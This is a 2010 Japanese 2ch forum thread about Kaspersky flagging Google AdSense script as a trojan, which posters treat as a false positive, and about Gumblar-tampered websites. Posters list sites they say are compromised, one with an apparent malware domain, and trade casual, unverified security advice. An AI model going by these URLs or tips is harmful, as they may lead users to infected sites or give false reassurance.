679 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:30:28
痛いニュースが感染しているらしい。
誰か確認して〜。


124 名前:Trackback(774)[] 投稿日:2010/01/25(月) 14:14:53 ID:Klq45gB4
サイトがトロイの木馬に感染してる?

125 名前:Trackback(774)[] 投稿日:2010/01/25(月) 14:41:52 ID:ABVnF2MI
カスペル兄貴に怒られたよ

http://pc11.2ch.net/test/read.cgi/blog/1161013763/124-

680 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:34:18
>>679
チェッカーじゃかからんがaguseでいったらTrojan.JS.Redirector.arだとさ

681 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:34:49
tcupの掲示板のいたるところで
Trojan.JS.Redirector.arって出るんだが
これカスペの誤検出なのかな?

682 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:35:14
Trojan.JS.Redirector.arが検出されました

683 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:37:28
>>235
のサイト踏んじゃったんだけど…
オンラインスキャンで反応でなければセーフでしょうか

684 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:41:43
もうどんなサイトも掲示板も安心できないこんな世の中じゃ

685 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:42:25
ポイズン

686 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:42:49
wikiwiki.jp感染してる?

687 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:43:39
RRASってホームエディションは使えないんだっけ?

688 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:44:47
>>681
aguseでいくとでるね
これなんだろう

689 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:49:24
したらばなんてトップページでTrojan.JS.Redirector.ar出るし

690 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:51:40
これ、アフィリエイトとか広告を誤検出してんじゃねぇの?

691 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:52:20
ν速にスレ立ってるなw

692 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:53:42
あちこち移動する度に「Trojan.JS.Redirector.ar」発見してカスペルスキーが怒るw
昨晩まで普通に見れたサイトばかりなんだが…

693 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:55:16
なんか一気に感染広がってる感じがするなあ

694 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:59:14
カスペ(笑)なら誤検出だろ
あそこゴミじゃんwwww

695 :名無しさん@お腹いっぱい。:2010/01/25(月) 15:59:29
>>691
うrl

696 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:00:33
痛いニュースウイルス感染か?
http://tsushima.2ch.net/test/read.cgi/news/1264402100/
これか?

697 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:00:40
GoogleのAdSenseに反応してるみたいだが

698 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:01:09
tp://pagead2.googlesyndication●com/pagead/show_ads.js

↑これじゃねぇの?って噂もあるみたいだけど
(こんなんその辺のサイトに埋め込まれまくりやん)

気力のある人はスクリプトを解析してみそwオレはごめんだがw

699 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:01:23
カスペだとひっかかるこれを誰かウィルストータルに送ってくれ
http://pagead2●googlesyndication●com/pagead/show_ads●js

700 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:01:45
googlesyndicationに反応してるのかね
誤検出ぽいなこれ

701 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:01:57
カスペ以外では何の問題もないんだから気にする必要はないな

702 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:04:02
>>698
これを誤検出しているようじゃ行く先々でアラートの嵐だろうな。

703 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:04:34
>>698-699
俺もそれだ。どう考えても誤検出だよなやっぱ
いちいち警告音鳴るのが凄く嫌だw

704 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:05:09
>>698
これをトロイって検出してるな
したらば掲示板を初めそこらじゅうで検出されてうざくてたまらん

705 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:06:27
グゥュエイイアアアアアアア!!!!

この音怖すぎ

706 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:07:10
カスペなんて使ってるからこうなるんだ
大人しくZEROとか使ってれば大丈夫

707 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:07:11
既に誰か投げてた

show_ads.js 1/40
http://www.virustotal.com/jp/analisis/250ea3d4d097c1ab23f4218e73cb8e3f72eed0e192fde86f4f81d3acc5812b34-1264402209

Kaspersky 7.0.0.125 2010.01.25 Trojan.JS.Redirector.ar

708 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:07:23
またカスペか・・・

709 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:07:50
>>706
冗談がお上手ね♪

710 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:08:20
>>709
カスペよりZEROの方が優秀ってのは皆知ってます

711 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:09:37
カスペルスカイって誤検出ばかりだな

712 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:12:42
この30分で「Trojan.JS.Redirector.ar」のGoogleでのヒット数が0から10まで増えた
急上昇ワードの26位になってるw

713 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:17:40
>>712
俺がググった時はこのスレがトップに出てきたわw

「Trojan.JS.Redirector.arって警告が出るぞ!」
「カスペがTrojan.JS.Redirector.ar検出してうるさいんだが」
「Trojan.JS.Redirector.arって何だ?」
「ググってみようぜ!」
「お、早速情報出てきた出てきた」
「…ってこれ俺達だし!!」

714 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:20:26
さすがネラー
こういった情報だけは異様にはやいな

715 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:20:31
カスユーザーざまぁ

716 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:20:38
吹いたw

717 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:25:24
>>678
>>7 はルータ使ってない人用って明記しとけばおk。

718 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:32:53
カスペの検出は正しかったみたい

719 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:33:35
>>718
冗談だろwww
俺のは全く反応してないぞww

720 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:38:16
誤検出じゃなかったらGumblarの比ではないくらい広まってることになるなw

721 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:38:43
どう考えても誤検出です。

722 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:38:44
show_ads.js 最終的にこうなった
ttp://labs-uploader.sabaitiba.com/virus/download/1264405015.txt

723 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:39:40
誤検出でなければググル先生がウンコ漏らすレベル

724 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:40:06
誤検出じゃなけりゃ大惨事だなw

725 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:40:53
>>718
カカスペの誤検知じゃないの?

ググって見るサイトのあっちこっちで、トトロイ続出なんだけど

726 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:42:21
トトロイって何か可愛げやのうw

727 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:43:20
カスペはこれだから駄目なんだよな

728 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:43:48
グーグルアドセンスか何かのjsに反応してるから
あちこちのサイトで検出されてるんだろ。
誤検出じゃなかったらスゲーとは思うんだが、
いちいちうるさくて困る。

729 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:45:33
>>723
漏らすね

730 :名無しさん@お腹いっぱい。:2010/01/25(月) 16:59:43
   ハ,,..,,ハ
  /;;・ω・;;ヽ 
.  (;( ^^^ );)
  `'ー---‐´
トトロイ
(2010〜)

731 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:02:14
>>730
かわええw

732 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:02:33
仕事早いよw

733 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:03:20
>>725は書写中枢障害の初期状態

734 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:04:24
>>659
Remote Procedure Call とめたらOSさえ起動しなくなったり、
OS起動にめっちゃ時間がかかったり、ほとんどのアプリが動かなくなったりするよ

WindowsNTとかでは止めれたんだけど、止めて動かなくなるバカが増えたのか
いつのまにか標準UIからは止められなくなった

735 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:04:37
トロイの検出ダイアログが一件に付き2つ出ることを表してるんじゃないの?
ダダイヤログって書くべきだったか。

736 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:05:28
俺もトトロイ検出しねえかな

737 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:06:51
トトロイはエロ動画を主食とします

738 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:08:47
googleの広告を誤検知かよ

739 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:11:03
カスペ「googleはトロイ」

740 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:11:13
google先生のshow_ads.jsは誤検知だな
本当にgoogle先生がやらかしたら世界中大騒ぎだわ

ふだんadblockで広告とめてるから警告さえでなかった

741 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:11:33
>>669
ありがとうございます。
ポート番号「445」をいじったらオンラインにつながれなくなり
ばたばたしていてレスが遅れて申し訳ありません。

tp://soudan1●biglobe●ne●jp/qa3068747.html

ここからトロイ検出が出て少しびっくりしてしまいましたが、
誤検出?のようですね。

742 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:11:33
地球\(^o^)/オワタ

743 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:12:33
googleアドセンス使ってるサイト全部ウイルス扱いかよw

カスペさん本気出したな

744 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:13:24
トトロイの鳴き声は凶悪だなぁ

745 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:13:57
グーグル先生を敵に回すと大変なことになっちまう

746 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:14:24
怒ってグーグルが無料のアンチウイルスソフト作ったらおもろいんだが。

747 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:17:12
google先生も難読化してるのか

748 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:18:50
google先生のjsも、javascript使ってリダイレクトしてるから、
JS redirectorにはかわらないな

749 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:19:07
>>746
それはむしろ作ってほしいな

750 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:19:38
これでGoogleの検索結果からカスペ関連のサイトが消えたら面白いんだがなw

751 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:19:40
google vs カスペ
最終決戦がはじまる

752 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:20:51
よりによってgoogle先生にケンカを売るとは・・・

753 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:22:19
google vs カスペとか決戦にならねえだろ

754 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:22:46
>>741
うそー開いちゃったよー

755 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:23:35
http://japan.cnet.com/news/sec/story/0,2000056024,20404879,00.htm
Google先生はAvast!を採用
カスペの時代は終わったね。

756 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:26:45
Googleとカスペルスキー

\\ == \    __           _┌┐
 [ [_二二_\_/./∠勹ヽ   ロロロ\| |. ̄.「 ̄l\[ ̄|\
  | .| - ┌‐─‐┤∠   ∠几 _ .「= | = | [  勹..|  l   | .| |
  | .| ‐ │匸 ̄ |フ /  = 」|. |.|E= .|.=.」 |  勹.|  レ、 | .| |
 「 「 ‐ │×′く[,..、|フ = ∠|ノノ 匸 __コ/ [´ |__/. |__」 |
 レィ ̄凵 L/\\| .| .λ  |、_,,/|  凵 [_∧__/ 、__/\_/
. \_イ__∧_二二二λ二/   ¨\_,.‐‐‐^-‐′

757 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:28:26
>>741
そっちかよw
もう>>7は次スレから不要に一票
手練は最初からわかって対処しているだろうし、下手に注釈つけても素人相手じゃどうしようもないわ

758 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:28:28
まさにがっぷり四つ!

759 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:29:41
ぐぐるあどはってる有名サイトどこ

760 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:30:10
利用者にことわりもなしに無断で広告表示するジャバスクリプトなんてウイルスとかわらんだろ
Googleアドセンスはウイルス扱いでいいよ

761 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:33:20
RPC止めるなんて危険なことしないでRRASでいいんじゃん?

762 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:33:44
カスペルスキー△「Googleはウイルス」
http://tsushima.2ch.net/test/read.cgi/news/1264408193/

763 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:34:16
   ハ,,..,,ハ
  /;;・ω・;;ヽ 
.  (;( ^^^ );)
  `'ー---‐´
  _,,_ ∩
 (^Д^)/
 ⊂  ノ とったどー
  (つ ノ
  (ノ


764 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:38:53
>>741のリンクは誤検出でFA?

765 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:39:19
「Trojan.JS.Redirector.ar」でググると、もう142件もヒットするようにw
急上昇ワードでも15位に上がりました

766 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:39:49
カスペのGoogleアドセンスは全部誤検出でしょ?

767 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:42:41
カスペ公式フォーラムにきた
Googlesyndication - Trojan.JS.Redirector.ar - Kaspersky Lab Forum
http://forum.kaspersky.com/index.php?s=4121c48068e6c432d51f81acd9e8a4b8&showtopic=155383

カスペルスキーの30日体験版を使用しているのですが
Trojan.JS.Redirector.arというトロイの木馬が検出されるのですが削除できなくて困っています。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1235796827

「trojan.js.redirector」はトロイの木馬?
http://blogs.yahoo.co.jp/capdaikou/7469484.html

768 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:46:20
Google AdSenseのヘルプフォーラム
Kaspersky Internet Security 2010でトロイの木馬と検知される
http://www.google.com/support/forum/p/adsense/thread?tid=5e14b46552f19fcb&hl=ja

769 :名無しさん@お腹いっぱい。:2010/01/25(月) 17:52:33
カスペって更新テストやってからファイル配信してないんじゃねーの?
こんなもんテストやってればすぐ気付くレベルだろ〜?

770 :名無しさん@お腹いっぱい。:2010/01/25(月) 18:00:22
>>730
かわゆすなぁ

771 :名無しさん@お腹いっぱい。:2010/01/25(月) 18:08:44
モフモフしそうだぎゃ

772 :名無しさん@お腹いっぱい。:2010/01/25(月) 18:13:10
ウィキペディアでGENO社員がGENOウイルスを隠している模様
http://tsushima.2ch.net/test/read.cgi/news/1264410510/

773 :名無しさん@お腹いっぱい。:2010/01/25(月) 18:27:59
× GENO
○ Gumblar

774 :名無しさん@お腹いっぱい。:2010/01/25(月) 18:37:34
ト、ト、トレンドマイクロのつ、つぎは
カ、カカ、カスペ・・・な、なんだなぁ〜
ぼぼぼ、ぼクはおむすび欲(ry+AA略

775 :名無しさん@お腹いっぱい。:2010/01/25(月) 18:54:53
また火狐野朗がなんかいっちゃってんのか

776 :名無しさん@お腹いっぱい。:2010/01/25(月) 18:57:08
>>772
またGENOか!
今ウイルスが蔓延したのはそいつらのせいといってもいいのに
あいつら全然反省してないんだな
もう業務停止命令出せや

777 :名無しさん@お腹いっぱい。:2010/01/25(月) 18:59:26 ?PLT(12031)
そのりくつは おかしい

778 :名無しさん@お腹いっぱい。:2010/01/25(月) 19:08:25
RequestPolicyを押してるけど
外部ドメインじゃなきゃ安全とかよくいえるな
FTPのっとられてればなんでもできるっての


779 :名無しさん@お腹いっぱい。:2010/01/25(月) 19:09:35
>>736
このへんないきものは こっそりあなたのPCにいるのです。たぶん。

780 :名無しさん@お腹いっぱい。:2010/01/25(月) 19:22:40
>>779
なにそれこわい

781 :名無しさん@お腹いっぱい。:2010/01/25(月) 19:26:37
>>779
なにそれこわい


でも>>730のみたいなのが画面の中歩いてたら消さないだろうな

782 :名無しさん@お腹いっぱい。:2010/01/25(月) 19:30:25
衆議院議員トトロイ
www●kishida●gr●jp
/*Exception*/

関係無いけどGoLiveのゴミソース
<csscriptdict import>
<script type="text/javascript" src="file:///C:/Documents and Settings/ukkiy/Application Data/Adobe/Adobe GoLive/Settings/JScripts/GlobalScripts/CSScriptLib.js"></script>
</csscriptdict>

ukkiy逃げて〜

783 :名無しさん@お腹いっぱい。:2010/01/25(月) 19:39:36
>>782
さすが自民クオリティw

ttp://megalodon.jp/2010-0125-1938-38/www.kishida.gr.jp/

784 :名無しさん@お腹いっぱい。:2010/01/25(月) 19:40:01
>>782
メールで対処お願いしました
とりあえずはトップページだけみたいですね

785 :名無しさん@お腹いっぱい。:2010/01/25(月) 19:41:18
>>783
民主の支部も改竄されなかったか?

786 :名無しさん@お腹いっぱい。:2010/01/25(月) 19:49:44
されとったな

787 :名無しさん@お腹いっぱい。:2010/01/25(月) 19:52:15
>>783は直リンしても大丈夫なの?

788 :名無しさん@お腹いっぱい。:2010/01/25(月) 19:53:17
>>666
家具が安くなるのはいいんだけど
まだ直ってないのね,そこ

789 :名無しさん@お腹いっぱい。:2010/01/25(月) 20:13:34
>>787
魚拓ページまでなら大丈夫
それ以上は感染対策してから池

790 :名無しさん@お腹いっぱい。:2010/01/25(月) 20:14:17
http://www.dotup.org/uploda/www.dotup.org593145.jpg

791 :名無しさん@お腹いっぱい。:2010/01/25(月) 21:00:06
最近よくGoogle先生喧嘩売られるね

792 :名無しさん@お腹いっぱい。:2010/01/25(月) 21:47:45
カスペ早く更新来てくれ
ギャーギャーうるせぇ

793 :名無しさん@お腹いっぱい。:2010/01/25(月) 22:05:34
>>792
カスペスレでやれ
【総合力で】Kaspersky Lab Part96【他社を圧倒】
http://pc11.2ch.net/test/read.cgi/sec/1261376321/

794 :名無しさん@お腹いっぱい。:2010/01/25(月) 22:14:09
tp://www●m-on●jp/でカスペがオブジェクト
tp://pagead2●googlesyndication●com/pagead/show_ads.js//show_adsから
Trojan.JS.Redirector.arを検出するんだが
>>698-699の通り誤検出ってことでいいのかな


795 :名無しさん@お腹いっぱい。:2010/01/25(月) 22:20:51
誤検出だからもうその話は終われ
23時頃修正くるらしいし

796 :名無しさん@お腹いっぱい。:2010/01/25(月) 22:38:15
>>795了解。
修正に期待。

797 :名無しさん@お腹いっぱい。:2010/01/25(月) 22:42:14

====以下誤検出スレ====


798 :名無しさん@お腹いっぱい。:2010/01/25(月) 22:52:35
まだ誤検出と決まったわけではない!

799 :名無しさん@お腹いっぱい。:2010/01/25(月) 23:38:30
ttp://www.just-kaspersky.jp/support/info/20100125.html?m=jui25k01

800 :名無しさん@お腹いっぱい。:2010/01/26(火) 01:37:20
IEでセキュリティレベルを高にするとjavaが無効になる分、動画サイトが見れなくなっちゃうんだけど
特定のアドレスを指定して、そのページだけjavaが有効になるっていう設定ってできる?

たとえば、いつもはセキュリティレベル高だけど、ようつべだけはセキュリティレベル中(java有効)になるとか
毎回レベルを指定するのが面倒だ

801 :名無しさん@お腹いっぱい。:2010/01/26(火) 01:44:02
火狐とかならお気にいりに入れてるサイトごとにセキュリティ設定出来るよ

802 :名無しさん@お腹いっぱい。:2010/01/26(火) 01:44:59
サイト登録すれば言いだけ
火狐野朗の自演か

803 :名無しさん@お腹いっぱい。:2010/01/26(火) 01:46:23
IEでもな

804 :名無しさん@お腹いっぱい。:2010/01/26(火) 01:47:55
>>800
インターネットオプションのセキュリティで
信頼済みサイトに登録すればいける。

でも火狐やプニルの方が楽といえば楽かな。

805 :名無しさん@お腹いっぱい。:2010/01/26(火) 01:50:43
IEの良いところ : Firefoxをダウンロードできる

806 :名無しさん@お腹いっぱい。:2010/01/26(火) 01:51:28
javaいれてなくてIEでセキュリティ高にしてあっても動画サイト見れるんだけど
これってなんか設定間違ってるってこと?

807 :名無しさん@お腹いっぱい。:2010/01/26(火) 01:58:31
>>804
信頼済みサイトのセキュリティレベルを中にして
http://www.youtube.com/を追加したけど見れない

プニルの個別設定でようつべをjava有効にしてみたけど見れない

なぜだ……

808 :名無しさん@お腹いっぱい。:2010/01/26(火) 02:07:33
>>807
設定後、ブラウザ再起動した?

809 :名無しさん@お腹いっぱい。:2010/01/26(火) 02:08:20
また糞狐が変なこと言い出したのか
さすがテンプレでnoscriptだか宣伝するだけあるな

810 :名無しさん@お腹いっぱい。:2010/01/26(火) 02:12:18
>>808
した。だが見れない

つべ以外の動画サイトも登録してはみたが、新しいjavaを入れろと表示されるだけ
もちろん、javaは最新版にしてあるし、セキュリティレベルを中に設定すれば問題なく見れる

811 :名無しさん@お腹いっぱい。:2010/01/26(火) 02:16:53
youtubeにjavaなんか使ってるか
javascriptのこといってるのか

812 :名無しさん@お腹いっぱい。:2010/01/26(火) 02:17:28 ?PLT(12031)
>>810
http://gumblarchecker.crz.jp/defend.html#ieallow
特定のウェブページを許可する項目を作りました

813 :名無しさん@お腹いっぱい。:2010/01/26(火) 02:18:09
節子、それjavascriptやない

814 :名無しさん@お腹いっぱい。:2010/01/26(火) 02:18:59
IE系だと、javascriptとActiveXだろうと

815 :名無しさん@お腹いっぱい。:2010/01/26(火) 02:19:04
あなたチューブ

816 :名無しさん@お腹いっぱい。:2010/01/26(火) 02:21:56
>>807
js(ジャバスクリプト)とActiveXの実行許可した?
jsとJAVAは全くの別物で、ようつべはJAVA多分関係ないよw

817 :名無しさん@お腹いっぱい。:2010/01/26(火) 02:31:22
>>812
ようつべが見れました。ありがとう
しかし、相変わらず別の動画サイトは見れないorz

818 :名無しさん@お腹いっぱい。:2010/01/26(火) 03:06:39
>>817
こんな程度で躓いているならあなたには無理。
現在感染していなくて>>6の対策がきちんとできているならそのままでいいよ。
現状で>>6以上の対策は掛け捨て確実な保険というか、自己満足や趣味の領域だから。

819 :名無しさん@お腹いっぱい。:2010/01/26(火) 03:39:06


http://tsushima.2ch.net/test/read.cgi/news/1264410510/

820 :名無しさん@お腹いっぱい。:2010/01/26(火) 03:39:40
IEは8?

821 :名無しさん@お腹いっぱい。:2010/01/26(火) 03:42:40
>>820
IE5です

822 :名無しさん@お腹いっぱい。:2010/01/26(火) 03:44:25
釣り乙

823 :名無しさん@お腹いっぱい。:2010/01/26(火) 03:46:04
>>822
マジレスなんだが・・・

824 :名無しさん@お腹いっぱい。:2010/01/26(火) 06:02:23
2kか9xかどっちかか?

825 :名無しさん@お腹いっぱい。:2010/01/26(火) 06:54:51
JavaScriptってレベルじゃねーぞ
ttp://www.chromeexperiments.com/

826 :名無しさん@お腹いっぱい。:2010/01/26(火) 06:56:23
IE5ってOS9ですか?

827 :名無しさん@お腹いっぱい。:2010/01/26(火) 06:57:46
JavaScriptってレベルじゃねーぞ
ttp://www.chromeexperiments.com/

828 :名無しさん@お腹いっぱい。:2010/01/26(火) 06:59:15
JavaScriptってレベルじゃねーぞ
ttp://www.chromeexperiments.com/

829 :名無しさん@お腹いっぱい。:2010/01/26(火) 07:06:09
誤爆スマソ

830 :名無しさん@お腹いっぱい。:2010/01/26(火) 08:31:26
ヤフーのブリーフケースからファイルを取り出そうとしたら
ノートンがTrojan.Malscript!htmlで反応したんだけど
感染してんのかな?それとも誤検?

831 :名無しさん@お腹いっぱい。:2010/01/26(火) 08:32:46
ノートンのサポートに訊けよ

832 :名無しさん@お腹いっぱい。:2010/01/26(火) 09:53:43
誤爆ってレベルじゃねーぞ

833 :名無しさん@お腹いっぱい。:2010/01/26(火) 15:47:48
>>830
virustotalに投げれば

834 :名無しさん@お腹いっぱい。:2010/01/26(火) 16:16:45
激安通販アラジン(/*Exception*/)
tp://toratomo●lovepop●jp/index/

さゆりちゃんの電気屋さん(/*Exception*/)
tp://electronics●sayurichan●com/

スニーカー通販(/*Exception*/)
momo-cafe●sunnyday●jp
トップページは403だが、該当ページにアクセス可能
/folder/sneaker
※ろりぽは事の重大さがわかってないらしい


調査に戻る..

835 :名無しさん@お腹いっぱい。:2010/01/26(火) 16:34:15
truelifefamily.ru

836 :名無しさん@お腹いっぱい。:2010/01/26(火) 17:32:10
ロリポとさくら大杉
というよりはロリポとさくらで調べて行ってるんだろうけどさ。

つーかロリポGMOだろ?
同じGMOのアイルでは「ガンブラー点検無償実施」とかやってるのに
つーかGMO自体がWebAlertってのやってんのに

やっぱ安物サーバーはこういう時にダメなんかねぇ。

837 :名無しさん@お腹いっぱい。:2010/01/26(火) 17:50:23
ユーザー層がアレだからだと思ってたw

838 :名無しさん@お腹いっぱい。:2010/01/26(火) 18:44:34
ExplorerにFTPのパス覚えさせてるような初心者が多いんだろう


839 :名無しさん@お腹いっぱい。:2010/01/26(火) 19:50:22
>>834
上:ろりぽにつーほー
中:403
下:そこも403になってました。

840 :名無しさん@お腹いっぱい。:2010/01/26(火) 20:33:44
   γ⌒ヽ
  < ・、,,,;;,)      ハ,,..,,ハ
  < つ=つ     /;;・ω・;;ヽ
  ノ   ノ三)     (;( ^^^ );)
∠、 m)=m)..    `'ー---‐´

 ガンブラー      トトロイ
(2009 〜 )      (2010 〜 )

841 :名無しさん@お腹いっぱい。:2010/01/26(火) 20:40:54
kawaii

842 :名無しさん@お腹いっぱい。:2010/01/26(火) 20:42:52
ハッカーってどうしてマウス使わないの?

843 :名無しさん@お腹いっぱい。:2010/01/26(火) 21:01:00
>>782
他人に迷惑かけておいてスクロールしなければ見えないところに告知してんなよ。
自分のことしか考えていないクソ政治家が露呈しているわ。

844 :名無しさん@お腹いっぱい。:2010/01/26(火) 21:02:29
>>843
ならば君が政治家になりたまえ

845 :名無しさん@お腹いっぱい。:2010/01/26(火) 21:23:12
まぁ通知すらしない企業だってあるんだし

846 :名無しさん@お腹いっぱい。:2010/01/26(火) 21:37:05
嫌な言い方

847 :名無しさん@お腹いっぱい。:2010/01/26(火) 22:11:02
サッカーマガジンの旧ページ(今は移転告知と転送だけ)
ttp://soccer.hikaritv-bbm●com/


848 :名無しさん@お腹いっぱい。:2010/01/26(火) 22:16:20
 

849 :名無しさん@お腹いっぱい。:2010/01/26(火) 22:56:15
>>847
whoisからべーすぼーるまがじんにめるしますた。

850 :名無しさん@お腹いっぱい。:2010/01/26(火) 23:27:33
>>849,839
乙です


851 :名無しさん@お腹いっぱい。:2010/01/26(火) 23:38:31
【セキュリティ】Gumblarの新しい亜種が突出、感染サイトの4割で検出(10/01/26)
http://pc11.2ch.net/test/read.cgi/pcnews/1264516499/

852 :名無しさん@お腹いっぱい。:2010/01/27(水) 01:18:54
わざと感染して、いろんなところにFTPアクセスすれば
Gumblarも混乱するんじゃ?

853 :名無しさん@お腹いっぱい。:2010/01/27(水) 01:22:16
>>852
全部書き換えられるのが落ち

854 :名無しさん@お腹いっぱい。:2010/01/27(水) 01:48:42
GENOみたいにweb改竄で感染させて ハードディスクフォーマットさせるウイルスってあるの?

855 :名無しさん@お腹いっぱい。:2010/01/27(水) 03:44:13
さくらオワタwww
ttp://www.google.com/safebrowsing/diagnostic?site=sakura.ne.jp&hl=ja
過去 90 日間に、このサイトの一部で不審な動きが 66 回報告されています。
Google による巡回テスト状況
このサイトで過去 90 日間に Google がテストした 6048 ページのうち
241 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、
インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは2010-01-26で、
このサイトで不審なコンテンツが最後に検出されたのは2010-01-26です。

不正なソフトウェアは (省略) を含む
135 個のドメインでホストされています。

(省略) を含む 20 個のドメインが、
このサイトの訪問者に不正なソフトウェアを
配布する媒体として機能しているようです。


ろりぽっぷ
ttp://www.google.com/safebrowsing/diagnostic?site=lolipop.jp&hl=ja

856 :名無しさん@お腹いっぱい。:2010/01/27(水) 04:16:32
KKJサイトにおける不正改ざんについての状況報告とお願い
ttp://www.kkj.or.jp/0120_info.php
お詫びは良いけどさ・・・

>【GENOウイルスチェッカー】
>ttp://geno.2ch.tc/



マスゴミがGumblarと8080を混同して報道したのが原因だろうな。


857 :名無しさん@お腹いっぱい。:2010/01/27(水) 05:35:31
>>856

ここもそうだよ
http://ameblo.jp/naturalhouse-shonan/entry-10438277179.html

なぜにブログで告知する…はおいといて

> ★ウィルス対策や駆除の方法
> ⇒コチラ のサイトに詳しく載っております。
>  所要時間はたったの5分です。

コチラ のサイト(どうしてそこ行く)
http://blog.ecstudio.jp/ec_studio_blog/090522geno-virus.html


858 :名無しさん@お腹いっぱい。:2010/01/27(水) 05:41:07
新種の告知かな
ttp://www●mag-x●com/


859 :名無しさん@お腹いっぱい。:2010/01/27(水) 06:23:51
>>858
改ざんされてる?


860 :名無しさん@お腹いっぱい。:2010/01/27(水) 06:33:32
糞チェッカーは糞

861 :名無しさん@お腹いっぱい。:2010/01/27(水) 07:06:38
>>859
サイトリニューアル

> 年末年始にかけて2週間のサイト閉鎖を行い、さらに、1月22日から25日まで、
> 部分的にページが見られなくなっておりましたこと、深くお詫びいたします。
> その後システムの調査をしましたところ、会員情報に関しては、漏洩の事実
> が認められなかったことを、ここにご報告させていただきます。

ウイルス感染問題はウヤムヤ


862 :名無しさん@お腹いっぱい。:2010/01/27(水) 07:56:35
>>861
レスありがとう

863 :名無しさん@お腹いっぱい。:2010/01/27(水) 09:20:21
>>857
コメントにSo-netセキュリティ通信のURLでも書いておこうかと思ったけど

>お互いに「アナログ人間万歳☆」ですね?!

これみて萎えた。

864 :名無しさん@お腹いっぱい。:2010/01/27(水) 10:02:22
知能テストに見せかけHDDのデータを破壊、危険なワームが拡大
HDDの重要な部分を破壊してしまう新手のワーム「Zimuse」が世界各地で感染を広げているという。
2010年01月27日 08時09分 更新
http://www.itmedia.co.jp/news/articles/1001/27/news022.html

Web知能テストに見せかけHDDのデータを破壊する粋なウィルスが登場
http://tsushima.2ch.net/test/read.cgi/news/1264552887/

865 :856:2010/01/27(水) 14:25:59
>>857
